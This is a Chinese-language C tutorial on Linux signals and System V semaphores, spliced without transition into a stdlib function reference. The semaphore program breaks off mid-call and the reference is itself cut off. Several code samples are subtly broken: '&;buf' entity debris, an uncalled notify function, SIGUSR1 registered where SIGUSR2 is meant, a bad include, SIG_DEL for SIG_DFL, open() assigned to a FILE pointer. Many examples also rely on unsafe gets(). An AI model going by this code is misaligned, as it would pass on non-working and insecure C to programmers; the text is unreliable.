int sigprocmask(int how,const sigset_t *set,sigset_t *oset);
sigemptyset函数初始化信号集合set,将set设置为空.sigfillset也初始化信号集合,只
是将信号集合设置为所有信号的集合.sigaddset将信号signo加入到信号集合之中,sigd
elset将信号从信号集合中删除.sigismember查询信号是否在信号集合之中.
sigprocmask是最为关键的一个函数.在使用之前要先设置好信号集合set.这个函数的作
用是将指定的信号集合set加入到进程的信号阻塞集合之中去,如果提供了oset那么当前
的进程信号阻塞集合将会保存在oset里面.参数how决定函数的操作方式.
SIG_BLOCK:增加一个信号集合到当前进程的阻塞集合之中.
SIG_UNBLOCK:从当前的阻塞集合之中删除一个信号集合.
SIG_SETMASK:将当前的信号集合设置为信号阻塞集合.
以一个实例来解释使用这几个函数.
#include <signal.h>
#include <stdio.h>
#include <math.h>
#include <stdlib.h>
int main(int argc,char **argv)
{
double y;
sigset_t intmask;
int i,repeat_factor;
if(argc!=2)
{
fprintf(stderr,"Usage:%s repeat_factor\n\a",argv[0]);
exit(1);
}
if((repeat_factor=atoi(argv[1]))<1)repeat_factor=10;
sigemptyset(&intmask); /* 将信号集合设置为空 */
sigaddset(&intmask,SIGINT); /* 加入中断 Ctrl+C 信号*/
while(1)
{
/*阻塞信号,我们不希望保存原来的集合所以参数为NULL*/
sigprocmask(SIG_BLOCK,&intmask,NULL);
fprintf(stderr,"SIGINT signal blocked\n");
for(i=0;i<repeat_factor;i++)y=sin((double)i);
fprintf(stderr,"Blocked calculation is finished\n");
/* 取消阻塞 */
sigprocmask(SIG_UNBLOCK,&intmask,NULL);
fprintf(stderr,"SIGINT signal unblocked\n");
for(i=0;i<repeat_factor;i++)y=sin((double)i);
fprintf(stderr,"Unblocked calculation is finished\n");
}
exit(0);
}
程序在运行的时候我们要使用Ctrl+C来结束.如果我们在第一计算的时候发出SIGINT信号
,由于信号已经屏蔽了,所以程序没有反映.只有到信号被取消阻塞的时候程序才会结束.
注意我们只要发出一次SIGINT信号就可以了,因为信号屏蔽只是将信号加入到信号阻塞
集合之中,并没有丢弃这个信号.一旦信号屏蔽取消了,这个信号就会发生作用.
有时候我们希望对信号作出及时的反映的,比如当拥护按下Ctrl+C时,我们不想什么事情
也不做,我们想告诉用户你的这个操作不好,请不要重试,而不是什么反映也没有的. 这个
时候我们要用到sigaction函数.
#include <signal.h>

int sigaction(int signo,const struct sigaction *act,
struct sigaction *oact);
struct sigaction {
void (*sa_handler)(int signo);
void (*sa_sigaction)(int siginfo_t *info,void *act);
sigset_t sa_mask;
int sa_flags;
void (*sa_restore)(void);
}
这个函数和结构看起来是不是有点恐怖呢.不要被这个吓着了,其实这个函数的使用相当
简单的.我们先解释一下各个参数的含义. signo很简单就是我们要处理的信号了,可以是
任何的合法的信号.有两个信号不能够使用(SIGKILL和SIGSTOP). act包含我们要对这个
信号进行如何处理的信息.oact更简单了就是以前对这个函数的处理信息了,主要用来保
存信息的,一般用NULL就OK了.
信号结构有点复杂.不要紧我们慢慢的学习.
sa_handler是一个函数型指针,这个指针指向一个函数,这个函数有一个参数.这个函数就
是我们要进行的信号操作的函数. sa_sigaction,sa_restore和sa_handler差不多的,只
是参数不同罢了.这两个元素我们很少使用,就不管了.
sa_flags用来设置信号操作的各个情况.一般设置为0好了.sa_mask我们已经学习过了
在使用的时候我们用sa_handler指向我们的一个信号操作函数,就可以了.sa_handler有
两个特殊的值:SIG_DEL和SIG_IGN.SIG_DEL是使用缺省的信号操作函数,而SIG_IGN是使用
忽略该信号的操作函数.
这个函数复杂,我们使用一个实例来说明.下面这个函数可以捕捉用户的CTRL+C信号.并输
出一个提示语句.
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#define PROMPT "你想终止程序吗?"
char *prompt=PROMPT;
void ctrl_c_op(int signo)
{
write(STDERR_FILENO,prompt,strlen(prompt));
}
int main()
{
struct sigaction act;
act.sa_handler=ctrl_c_op;
sigemptyset(&act.sa_mask);
act.sa_flags=0;
if(sigaction(SIGINT,&act,NULL)<0)
{
fprintf(stderr,"Install Signal Action Error:%s\n\a",strerror(errno));
exit(1);
}
while(1);
}
在上面程序的信号操作函数之中,我们使用了write函数而没有使用fprintf函数.是因为
我们要考虑到下面这种情况.如果我们在信号操作的时候又有一个信号发生,那么程序该
如何运行呢? 为了处理在信号处理函数运行的时候信号的发生,我们需要设置sa_mask成
员. 我们将我们要屏蔽的信号添加到sa_mask结构当中去,这样这些函数在信号处理的时
候就会被屏蔽掉的.
3。其它信号函数 由于信号的操作和处理比较复杂,我们再介绍几个信号操作函数.

#include <unistd.h>
#include <signal.h>
int pause(void);
int sigsuspend(const sigset_t *sigmask);
pause函数很简单,就是挂起进程直到一个信号发生了.而sigsuspend也是挂起进程只是在
调用的时候用sigmask取代当前的信号阻塞集合.
#include <sigsetjmp>
int sigsetjmp(sigjmp_buf env,int val);
void siglongjmp(sigjmp_buf env,int val);
还记得goto函数或者是setjmp和longjmp函数吗.这两个信号跳转函数也可以实现程序的
跳转让我们可以从函数之中跳转到我们需要的地方.
由于上面几个函数,我们很少遇到,所以只是说明了一下,详细情况请查看联机帮助.
4。一个实例 还记得我们在守护进程创建的哪个程序吗?守护进程在这里我们把那个
程序加强一下. 下面这个程序会在也可以检查用户的邮件.不过提供了一个开关,如果用
户不想程序提示有新的邮件到来,可以向程序发送SIGUSR2信号,如果想程序提供提示可以
发送SIGUSR1信号.
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <pwd.h>
#include <sys/types.h>
#include <sys/stat.h>
/* Linux 的默任个人的邮箱地址是 /var/spool/mail/ */
#define MAIL_DIR "/var/spool/mail/"
/* 睡眠10秒钟 */
#define SLEEP_TIME 10
#define MAX_FILENAME 255
unsigned char notifyflag=1;
long get_file_size(const char *filename)
{
struct stat buf;
if(stat(filename,&;buf)==-1)
{
if(errno==ENOENT)return 0;
else return -1;
}
return (long)buf.st_size;
}
void send_mail_notify(void)
{
fprintf(stderr,"New mail has arrived\007\n");
}
void turn_on_notify(int signo)
{
notifyflag=1;
}
void turn_off_notify(int signo)
{
notifyflag=0;
}
int check_mail(const char *filename)
{
long old_mail_size,new_mail_size;
sigset_t blockset,emptyset;
sigemptyset(&;blockset);
sigemptyset(&;emptyset);
sigaddset(&;blockset,SIGUSR1);
sigaddset(&;blockset,SIGUSR2);
old_mail_size=get_file_size(filename);
if(old_mail_size<0)return 1;
if(old_mail_size>0) send_mail_notify();
sleep(SLEEP_TIME);
while(1)
{
if(sigprocmask(SIG_BLOCK,&;blockset,NULL)<0) return 1;
while(notifyflag==0)sigsuspend(&;emptyset);
if(sigprocmask(SIG_SETMASK,&;emptyset,NULL)<0) return 1;
new_mail_size=get_file_size(filename);
if(new_mail_size>old_mail_size)send_mail_notify;
old_mail_size=new_mail_size;
sleep(SLEEP_TIME);
}
}
int main(void)
{
char mailfile[MAX_FILENAME];
struct sigaction newact;
struct passwd *pw;
if((pw=getpwuid(getuid()))==NULL)
{
fprintf(stderr,"Get Login Name Error:%s\n\a",strerror(errno));
exit(1);
}
strcpy(mailfile,MAIL_DIR);
strcat(mailfile,pw->pw_name);
newact.sa_handler=turn_on_notify;
newact.sa_flags=0;
sigemptyset(&;newact.sa_mask);
sigaddset(&;newact.sa_mask,SIGUSR1);
sigaddset(&;newact.sa_mask,SIGUSR2);
if(sigaction(SIGUSR1,&;newact,NULL)<0)
fprintf(stderr,"Turn On Error:%s\n\a",strerror(errno));
newact.sa_handler=turn_off_notify;
if(sigaction(SIGUSR1,&;newact,NULL)<0)
fprintf(stderr,"Turn Off Error:%s\n\a",strerror(errno));
check_mail(mailfile);
exit(0);
}
信号操作是一件非常复杂的事情,比我们想象之中的复杂程度还要复杂,如果你想彻底的
弄清楚信号操作的各个问题,那么除了大量的练习以外还要多看联机手册.不过如果我们
只是一般的使用的话,有了上面的几个函数也就差不多了. 我们就介绍到这里了.

6)Linux程序设计入门--消息管理
前言:Linux下的进程通信(IPC)
Linux下的进程通信(IPC)
POSIX无名信号量
System V信号量
System V消息队列
System V共享内存
1。POSIX无名信号量 如果你学习过操作系统,那么肯定熟悉PV操作了.PV操作是原子
操作.也就是操作是不可以中断的,在一定的时间内,只能够有一个进程的代码在CPU上面
执行.在系统当中,有时候为了顺利的使用和保护共享资源,大家提出了信号的概念. 假设
我们要使用一台打印机,如果在同一时刻有两个进程在向打印机输出,那么最终的结果会
是什么呢.为了处理这种情况,POSIX标准提出了有名信号量和无名信号量的概念,由于Li
nux只实现了无名信号量,我们在这里就只是介绍无名信号量了. 信号量的使用主要是用
来保护共享资源,使的资源在一个时刻只有一个进程所拥有.为此我们可以使用一个信号
灯.当信号灯的值为某个值的时候,就表明此时资源不可以使用.否则就表>示可以使用.
为了提供效率,系统提供了下面几个函数
POSIX的无名信号量的函数有以下几个:
#include <semaphore.h>
int sem_init(sem_t *sem,int pshared,unsigned int value);
int sem_destroy(sem_t *sem);
int sem_wait(sem_t *sem);
int sem_trywait(sem_t *sem);
int sem_post(sem_t *sem);
int sem_getvalue(sem_t *sem);
sem_init创建一个信号灯,并初始化其值为value.pshared决定了信号量能否在几个进程
间共享.由于目前Linux还没有实现进程间共享信号灯,所以这个值只能够取0. sem_dest
roy是用来删除信号灯的.sem_wait调用将阻塞进程,直到信号灯的值大于0.这个函数返回
的时候自动的将信号灯的值的件一.sem_post和sem_wait相反,是将信号灯的内容加一同
时发出信号唤醒等待的进程..sem_trywait和sem_wait相同,不过不阻塞的,当信号灯的值
为0的时候返回EAGAIN,表示以后重试.sem_getvalue得到信号灯的值.
由于Linux不支持,我们没有办法用源程序解释了.
这几个函数的使用相当简单的.比如我们有一个程序要向一个系统打印机打印两页.我们
首先创建一个信号灯,并使其初始值为1,表示我们有一个资源可用.然后一个进程调用se
m_wait由于这个时候信号灯的值为1,所以这个函数返回,打印机开始打印了,同时信号灯
的值为0 了. 如果第二个进程要打印,调用sem_wait时候,由于信号灯的值为0,资源不可
用,于是被阻塞了.当第一个进程打印完成以后,调用sem_post信号灯的值为1了,这个时候
系统通知第二个进程,于是第二个进程的sem_wait返回.第二个进程开始打印了.
不过我们可以使用线程来解决这个问题的.我们会在后面解释什么是线程的.编译包含上
面这几个函数的程序要加上 -lrt选贤,以连接librt.so库
2。System V信号量 为了解决上面哪个问题,我们也可以使用System V信号量.很幸运的
是Linux实现了System V信号量.这样我们就可以用实例来解释了. System V信号量的函
数主要有下面几个.
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
key_t ftok(char *pathname,char proj);
int semget(key_t key,int nsems,int semflg);
int semctl(int semid,int semnum,int cmd,union semun arg);
int semop(int semid,struct sembuf *spos,int nspos);
struct sembuf {
short sem_num; /* 使用那一个信号 */
short sem_op; /* 进行什么操作 */
short sem_flg; /* 操作的标志 */
};
ftok函数是根据pathname和proj来创建一个关键字.semget创建一个信号量.成功时返回
信号的ID,key是一个关键字,可以是用ftok创建的也可以是IPC_PRIVATE表明由系统选用
一个关键字. nsems表明我们创建的信号个数.semflg是创建的权限标志,和我们创建一个
文件的标志相同.
semctl对信号量进行一系列的控制.semid是要操作的信号标志,semnum是信号的个数,cm
d是操作的命令.经常用的两个值是:SETVAL(设置信号量的值)和IPC_RMID(删除信号灯).
arg是一个给cmd的参数.
semop是对信号进行操作的函数.semid是信号标志,spos是一个操作数组表明要进行什么
操作,nspos表明数组的个数. 如果sem_op大于0,那么操作将sem_op加入到信号量的值中
,并唤醒等待信号增加的进程. 如果为0,当信号量的值是0的时候,函数返回,否则阻塞直
到信号量的值为0. 如果小于0,函数判断信号量的值加上这个负值.如果结果为0唤醒等待
信号量为0的进程,如果小与0函数阻塞.如果大于0,那么从信号量里面减去这个值并返回
..
下面我们一以一个实例来说明这几个函数的使用方法.这个程序用标准错误输出来代替我
们用的打印机.
#include <stdio.h>
#include <unistd.h>
#include <limits.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#define PERMS S_IRUSR|S_IWUSR
void init_semaphore_struct(struct sembuf *sem,int semnum,
int semop,int semflg)
{
/* 初始话信号灯结构 */
sem->sem_num=semnum;
sem->sem_op=semop;
sem->sem_flg=semflg;
}
int del_semaphore(int semid)
{
/* 信号灯并不随程序的结束而被删除,如果我们没删除的话(将1改为0)
可以用ipcs命令查看到信号灯,用ipcrm可以删除信号灯的
*/
#if 1
return semctl(semid,0,IPC_RMID);
#endif
}
int main(int argc,char **argv)
{
char buffer[MAX_CANON],*c;
int i,n;
int semid,semop_ret,status;
pid_t childpid;
struct sembuf semwait,semsignal;
if((argc!=2)||((n=atoi(argv[1]))<1))
{
fprintf(stderr,"Usage:%s number\n\a",argv[0]);
exit(1);
}
/* 使用IPC_PRIVATE 表示由系统选择一个关键字来创建 */
/* 创建以后信号灯的初始值为0 */
if((semid=semget(IPC_PRIVATE,1,PERMS))==-1)
{
fprintf(stderr,"[%d]:Acess Semaphore Error:%s\n\a",
getpid(),strerror(errno));
exit(1);
}
/* semwait是要求资源的操作(-1) */
init_semaphore_struct(&semwait,0,-1,0);
/* semsignal是释放资源的操作(+1) */
init_semaphore_struct(&semsignal,0,1,0);
/* 开始的时候有一个系统资源(一个标准错误输出) */
if(semop(semid,&semsignal,1)==-1)
{
fprintf(stderr,"[%d]:Increment Semaphore Error:%s\n\a",
getpid(),strerror(errno));
if(del_semaphore(semid)==-1)
fprintf(stderr,"[%d]:Destroy Semaphore Error:%s\n\a",
getpid(),strerror(

void abort ( void );
打印“Abnormal termination program”,立即停止进程。不关闭任何已打开的流
也不执行atexit确定的任何函数。
The calling process does not receives back control. abort returns error
code 3 to the parent process or the OS

/* abort example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  FILE * pFile;
  pFile= fopen ("myfile.txt","r");
  if (pFile == NULL)
  {
    printf ("error opening file\n");
    abort();
  }

  /* normal file manipulation here */

  fclose (pFile);
  return 0;
}
If myfile.txt doesn't exist a message is printed, abort is called and
the errorlevel.returned would be 3. Otherwise the file is normally
closed and the errorlevel returned is 0 (return 0).

///////////////////////////////////////////////////////////////////////
void exit ( int status );
函数执行标准的清理过程，之后结束。在清理之前，被atexit注册的函数首先
被执行。
清理过程要关闭所有的缓存和关闭任何打开的文件。
参数status 返回给父进程（如果存在），或者给操作系统（就象在main函数有
一个return语句）
总之，返回0或EXIT_SUCCESS表示成功，其它任何值或常量EXIT_FAILURE表示一
个错误
或不正常的程序终止。
/* exit example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  FILE * pFile;
  pFile = open ("myfile.txt","r");
  if (pFile==NULL)
  {
    printf ("Error opening file");
    exit (1);
  }
  else
  {
    /* file operations here */
  }
  return 0;
}

/////////////////////////////////////////////////////////////////////
int atexit ( void (* function ) (void) );

指定函数在离开时执行。
function变量指定的函数在程序正常结束时被调用。
如果有一个以上的指定函数，它们将按相反顺序执行。
ANSI标准指定最多32个函数可以在一个进程内被指定。
这些函数在被调用时不会接受任何变量。
如果成功返回0，如果存在一个错误返回一个非零值。
/* atexit example */
#include <stdio.h>
#include <stdlib.h>

void fnExit1 (void)
{
  printf ("Exit function 1.\n");
}

void fnExit2 (void)
{
  printf ("Exit function 2.\n");
}

int main ()
{
  atexit (fnExit1);
  atexit (fnExit2);
  printf ("Main function.\n");
  return 0;
}

///////////////////////////////////////////////////////////
int abs ( int n );
返回整数变量的绝对值
ANSI-C++中还结合了 long abs (long n );
其功能和函数labs相同

////////////////////////////////////////////////////////////////
double atof ( const char * string );
解析string的内容，并转换成浮点数。string 内容是一个浮点数的字符串表示。
数字直到一个非数字字符被发现为止（数字，符号，E和e在指定的格式内认为是
有效的）。
格式为：[whitespaces][+|-][nnnn][.mmmm][e|E[+|-]nnnn]其中whitespaces
是tab或space字符
nnnnn是数字字符的任何一个。
返回的是输入字符串转换成的浮点值。一旦溢出结果将不确定。如果有一个错误
将返回0.0
* atof example: sines calculator */
#include <stdio.h>
#include <stdlib.h>
#include <math.h>

int main ()
{
  double n,m;
  double pi=3.1415926535;
  char szInput [256];
  printf ( "Enter degrees: " );
  gets ( szInput );
  n = atof ( szInput );
  m = sin (n*pi/180);
  printf ( "sine of %f degrees is %f\n" , n, m );
  return 0;
}

Output:
Enter degrees: 45
sine of 45.000000 degrees is 0.707101
///////////////////////////////////////////////////////////////
int atoi ( const char * string );
把字符串转换为整数值，直到遇到非字符值时才结束()。
格式为[whitespaces][+|－][nnnn][.mmm][e|E[+|-]nnn]
如果溢出，结果将不确定。如果错误出现将返回0
/* atoi example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int i;
  char szInput [256];
  printf ("Enter a number: ");
  gets ( szInput );
  i = atoi (szInput);
  printf ("Value entered is %d, and its double %d",i,i*2);
  return 0;
}

Output:
Enter a number: 73
Value entered is 73, and its double 146
//////////////////////////////////////////////////////////
long atol ( const char * string );

/* atol example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int i;
  char szInput [256];
  printf ("Enter a long number: ");
  gets ( szInput );
  i = atol (szInput);
  printf ("Value entered is %d, and its double %d",i,i*2);
  return 0;
}

Output:
Enter a long number: 567283
Value entered is 567283, and its double 1134566

///////////////////////////////////////////////////////
char * ecvt ( double value,int num, int *dec, int * sign );
把数值转换为以'\0'结束的字符串。如果num大于可表示的value字符数，那么余
下的字符串就填补为o
如果num小于，那么多余的就舍去。
仅当位数被返回时。十进数的可以从dec获得。The position of the decimal
point can be otained from dec, that is a pointer to an int value
representing the position of the decimal point respect to the beginning
of the string (0 or less indicates that the decimal point lies to
the left of the digits). 数值符号可以从sign变量获得。它指向一个int值
（如果是0，值就是正，否则就是负）。
行为象fctv
value 为将被转换为字符串的浮点数
num  返回数字的位数，如果大于可表示的位数，余下的部分将填补为0，如果小，
低位的位数将被省略。dec 一个指向int的指针。存储小数点位置。如果是零或
更小，小数点在位数的左边。
sign 一个指向int的指针。0代表正号，非零代表负数。
返回一个'\0'结束的字符串，其长度为num（代表数值的位数），小数点和符号
不被返回。而在dec和sign变量中。
这个缓冲器是静态分配。如果ecvt或fcvt调用，它将被重写。
/* ecvt example: scientific notations */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  char *buffer;
  double value = 365.249;
  int precision = 5;
  int decimal, sign;
 
  buffer = ecvt (value, precision, &decimal, &sign);
  printf ("%c%c.%s x 10^%d\n",sign?'-':'+',buffer[0],buffer+1,decimal-1);
  return 0;
}

Output:
+3.6525 x 10^2
/////////////////////////////////////////////////////////////////////////////////////
double atof ( const char * string )
把字符串转换成double
string代表一个浮点数。直到非数字符为止才认为输入结束（位数，符号数，
e和E都认为在此特定格式下
是有效数字）。[whitespaces][+|-][nnnn][.nnnn][e|E[+|-]nnn]
返回的是转换的浮点值。如果溢出，结果不确定。如果出现错误，返回0.0
/* atof example: sines calculator */
#include <stdio.h>
#include <stdlib.h>
#include <math.h>

int main ()
{
 char inputs[300];
 double n,m;
 const double pi = 3.1415926;
 printf("enter degrees : ");
 gets ( inputs );
 n = atof ( inputs );
 m = sin (n*pi/180);
 printf (" since of %f degrees is %f ",n , m);
 return 0;

}

/////////////////////////////////////////////////////////////////////////////////////////
char * gcvt ( double value,int num,char * buffer );
转换浮点数为一个'\0'结束位数为num的字符串。gcvt产生一个包括小数点的十
进制数，如果需要还会有符号。num表示的位数不足，函数将产生一个指数形式
的数，就像printf 的%e做的。函数还会在字符串后附一个'\0'
所以存放string的buffer通常比num更大。
value 将被转换为字符串的浮点数
num   产生的位数
buffer 存储转换结果的字符串。它应该比num大，以便可以存储小数点、符号
和可能的指数信息还有一个'\0'
总之，如果执行，buffer应该比num大8和9个字符。
返回的是以'\0'结束的数字字符串。
/* gcvt example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  char buffer [20];
  gcvt (1365.249,6,buffer);
  puts (buffer);
  gcvt (1365.249,3,buffer);
  puts (buffer);
  return 0;
}

Output:
1365.25
1.37e+003
/////////////////////////////////////////////////////////////////////////////////////////////
int atoi ( const char * string );
把字符串存储的数字字符转换为整型，并返回一个int值。
string代表一个数字字符表示的字符串。数字直到'\0'为止（数字符、和符号在
特定的格式下认为是有效的）。这个格式
为[whitespaces][+|-][nnnn]
返回转换的整数值，一旦溢出，结果将不确定。如果有错误返回0
/* atoi example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int i;
  char szInput [256];
  printf ("Enter a number: ");
  gets ( szInput );
  i = atoi (szInput);
  printf ("Value entered is %d, and its double %d",i,i*2);
  return 0;
}

Output:
Enter a number: 73
Value entered is 73, and its double 146
////////////////////////////////////////////////////////////////////////////////////////////////
long atol ( const char * string );与 int atoi ( const char * string );
类似
///////////////////////////////////////////////////////////////////////////////////////////////
double strtod ( const char * string, char * * endptr);
endptr 一个指针。函数向它填充扫描结束时的地址。以便决定第一个非数字字符
的位置。
如果转换导致溢出结果将是+/- HUGE_VAL
如果有错误出现返回0
/* strtod example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  char szInput [256];
  char * pEnd;
  double dbl;
  printf ("Enter a floating-point value: ");
  gets (szInput);
  dbl = strtod (szInput,&pEnd);
  printf ("Value entered: %lf. Its square: %lf\n",dbl,dbl*dbl);
  return 0;
}

/////////////////////////////////////////////////////////////////////////////////////////////
long strtol ( const char * string, char * * endptr, int radix);
有效数字为0到radix－1格式为[whitespaces][+|-][0|0x][nnnnn]
radix(基数)  0x代表16进制数。0代表8进制数。1到9的任何数代表10进制
如果溢出结果是LONG_MAX OR LONG_MIN
如果出现错误或没有转换将返回0
/* strtol example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  char szInput [256];
  char * pEnd;
  long l;
  printf ("Enter an integer value: ");
  gets (szInput);
  l = strtol (szInput,&pEnd,0);
  printf ("Value entered: %ld. Its double: %ld\n",l,l*2);
  return 0;
}
//////////////////////////////////////////////////////////////////////////////////////
unsigned long strtoul ( const char * string,char * * endptr, int rsdix);
如果溢出结果为ULONG_MAX,如果出现错误返回0
* strtoul example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  char szInput [256];
  char * pEnd;
  unsigned long ul;
  printf ("Enter an integer value: ");
  gets (szInput);
  ul = strtoul (szInput,&pEnd,0);
  printf ("Value entered: %lu. Its double: %lu\n",ul,ul*2);
  return 0;
}
/////////////////////////////////////////////////////////////////////////////////////////
char * itoa ( int value, char * buffer, int radix);
把整型转换为'\0'结束的radix进制的数字字符串。并且不结果存储在给定的
buffer。如果radix是10而且值是负字符串前首先为－。对于任何其它的radix，
value总是被认为是无符号的。buffer应该足够大。以便可以容下可能的值
(sizeof(int)*8+1)(对于radix=2)。例如在16位的平台用在17个字节
32位的平台用33字节。
radix在2到36之间。
/* itoa example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int i;
  char buffer [33];
  printf ("Enter a number: ");
  scanf ("%d",&i);
  itoa (i,buffer,10);
  printf ("decimal: %s\n",buffer);
  itoa (i,buffer,16);
  printf ("hexadecimal: %s\n",buffer);
  itoa (i,buffer,2);
  printf ("binary: %s\n",buffer);
  return 0;
}

Output:
Enter a number: 1750
decimal: 1750
hexadecimal: 6d6
binary: 11011010110
//////////////////////////////////////////////////////////////////////////////////////////////
char * ultoa ( unsigned long value, char * buffer, int radix);
char * ltoa ( long value,char * buffer,int radix);
///////////////////////////////////////////////////////////////////////////////////////////////////////
char * getenv ( const char * varname );
得到一个以'\0'结束的字符串，该字符串表示的是名字位varname的环境变量。
如果要求的变量没有在环境中定义，函数返回指针NULL
返回的指针不是旨在修改环境变量的操作。参考平台的手册。
varename null结束的字符串，其包含所要求变量的名字。
返回所要求环境变量的值，其以null结束的字符串表示。如果环境变量不存在返
回NULL
不要使用返回的指针直接修改程序的环境变量。
/* getenv example: getting path */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  char * buffer;
  buffer = getenv ("PATH");
  if (buffer!=NULL)
    printf ("Current path is: %s",buffer);
  return 0;
}
///////////////////////////////////////////////////////////////////////////////////////////
int putenv ( const char * envvar);
增加指定的字符串变量到现在进程的环境中去。因为环境每个名字只接受一个
变量。这一函数也可以用于修改和删除现存的环境变量。putenv只能修改此进
程的和由此创造的进程的环境变量，而不是操作系统的等级上。
一旦此进程结束，父进程的环境变量将不会在这次调用十被改变。
envvar 是null结束的字符串，其包含变量的名字、等号＝和环境变量的值。
varemane=value
如果环境变量的值存在它的值将被代替。如果值没有指定，那么拥有此环境变
量的值将被去除。
如果成功返回0。如果发生错误返回－1
/* putenv example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  char * buffer ;
  buffer = getenv ("RESOURCES");
  if (buffer==NULL)
  {
    putenv ("RESOURCES=www.cplusplus.com");
    puts ("environment variable successfully set");
  }
  else puts ("environment variable already existed");
  return 0;
}

///////////////////////////////////////////////////////////////////////////////////////////
int system ( const char * command);
调用命令解释器执行一个命令。一旦结束，解释器把控制交还给程序，并且返还
一个int值。command 是一个用'\0'结束的字符串表示的系统命令。
如果命令成功执行将返回适当的值。一般0表示无错误的执行结束。返回－1表示
一个错误
全局变量errno被设置以便指定以下错误中的一个。
ENOENT Command interpreter not found
ENOEXEC Command interpreter is not executable
ENOMEM Error allocating memory for the process
E2BIG Argument list too big
/* system example : DIR */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int i;
  puts ("Trying to execute command DIR");
  i = system ("dir");
  if (i==-1) puts ("Error executing DIR");
  else puts ("Command successfully executed");
  return 0;
}
//////////////////////////////////////////////////////////////////////////////////////
div_t ( int numer, int denom );
numer被denom除，得到的商和余数返回给结构体div_t中。
numer是分子，denom是分母。
返回一个结构体div_t ，typedef struct { int quot; int rem; } div_t;
div_t在stdlib.h中定义，quot代表商，rem代表余数。
/* div example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  div_t divresult;
  divresult = div (38,5);
  printf ("38 / 5 = %d ( %d", divresult.quot, divresult.rem);
  return 0;
}

Output:
38 / 5 = 7 ( 3
////////////////////////////////////////////////////////////////////////////
ldiv_t ldiv ( long int numer, long int denom );
typedef struct { long int quot, long int rem } ldiv_t;
////////////////////////////////////////////////////////////////////////////
long labs (long n ); 与abs一样
////////////////////////////////////////////////////////////////////////////
void * calloc ( size_t num, size_t size);
动态分配num个size字节大小的元素的存储空间。其块空间全部初始化位0
最终结果是分配num*size字节的存储空间。
返回分配空间的指针。此指针的类型为void * 通常要对返回的指针进行相应的
类型转换。如果系统不能分配相应大小的
存储空间或者有变量为0 将返回指针NULL
/* calloc example: rememb-o-matic */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int i,n;
  int * pData;
  printf ("Enter number of items to be remembered: ");
  scanf ("%d",&i);
  pData = (int*) calloc (i,sizeof(int));
  if (pData==NULL) exit (1);
  for (n=0;n<i;n++)
  {
    printf ("Enter number #%d: ",n);
    scanf ("%d",&pData[n]);
  }
  printf ("You have entered: ");
  for (n=0;n<i;n++) printf ("%d ",pData[n]);
  free (pData);
  return 0;
}
///////////////////////////////////////////////////////////////////////////////////////////////
void * malloc (size_t size);
分配size字节的存储空间。如果成功，返回指向存储空间的指针。如果不能分配
足够的空间或者size为0将返回
NULL
/////////////////////////////////////////////////////////////////////////////////////////////////
void * realloc ( void * memblock,size_t size);
menblock指针变量指向的存储空间大小变为size字节（可扩张也可减少）。
此块能会移动到新的地方，此时存储空间的内容仍然不会变。
如果memblock是NULL函数行为象malloc一样分配一个新的size字节的存储空间。
并返回其指针。
如果size是0先前分配的memblock被解析，并返回NULL
/* realloc example: rememb-o-matic */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int input,n;
  int count=0;
  int * numbers = NULL;

  do {
     printf ("Enter an integer value (0 to end): ");
     scanf ("%d", &input);
     count++;
     numbers = (int*) realloc (numbers, count * sizeof(int));
     if (numbers==NULL)
       { puts ("Error (re)allocating memory"); exit (1); }
     numbers[count-1]=input;
  } while (input!=0);

  printf ("Numbers entered: ");
  for (n=0;n<count;n++) printf ("%d ",numbers[n]);
  free (numbers);

  return 0;
}
///////////////////////////////////////////////////////////////////////////////
void free (void * memblock );
释放先前malloc、calloc、realloc分配的空间。
memblock必须为先前分配的空间的指针。如果无效的指针给函数，其结果将不确
定。
/* free example */
#include <stdio.h>
#include <stdlib.h>

int main ()
{
  int * buffer1, * buffer2, * buffer3;
  buffer1 = (int*) malloc (100*sizeof(int));
  buffer2 = (int*) calloc (100,sizeof(int));
  buffer3 = (int*) realloc (buffer2,500*sizeof(int));
  free (buffer1);
  free (buffer3);
  return 0;
}
////////////////////////////////////////////////////////////////////////
void * lfind ( const void * key,const void * base,size_t num,size_t
width,int (* fncomparison)(const void *,const void *));
线性搜索
在指针base和num个元素形成的数组中搜索给定的key，每个元素大小为width字节。
返回第一个匹配key的第一个元素地址。函数fncomparison
执行比较操作。
函数执行线性搜索，所以不必在调用之前进行排序。
key 寻找对象的指针
base 被查找的数组的指针
num 数组的元素个数
width 数组中每个元素的大小
fncompare  比较两个元素的函数。 这个函数必须由其调用者提供，而且还要如
下面一样申明。
int fncompare ( const void * elem1,const void * elem2);
函数需要接受两个变量，而且它们都是元素的指针。当两个变量相等就返回0，
如果不等就返回非0值
返回数列中与key匹配的值的指针。如果没有找到key 返回NULL
/* lfind example */
#include <stdio.h>
#include <stdlib.h>

int values[] = { 10, 40, 100, 20, 90, 25};

int compare (const void * a, const void * b)
{
  return ( *(int*)a - *(int*)b );
}

int main ()
{
  int * pItem;
  int key = 40;
  pItem = (int*) lfind (&key, values, 6, sizeof (int), compare);
  if (pItem!=NULL)
    printf ("%d is in the array",*pItem);
  else
    printf ("%d is not in the array",key);
  return 0;
}

//////////////////////////////////////////////////////////////////////////////////////////
void*  lsearch ( const void * key, void * base, size_t num, size_t
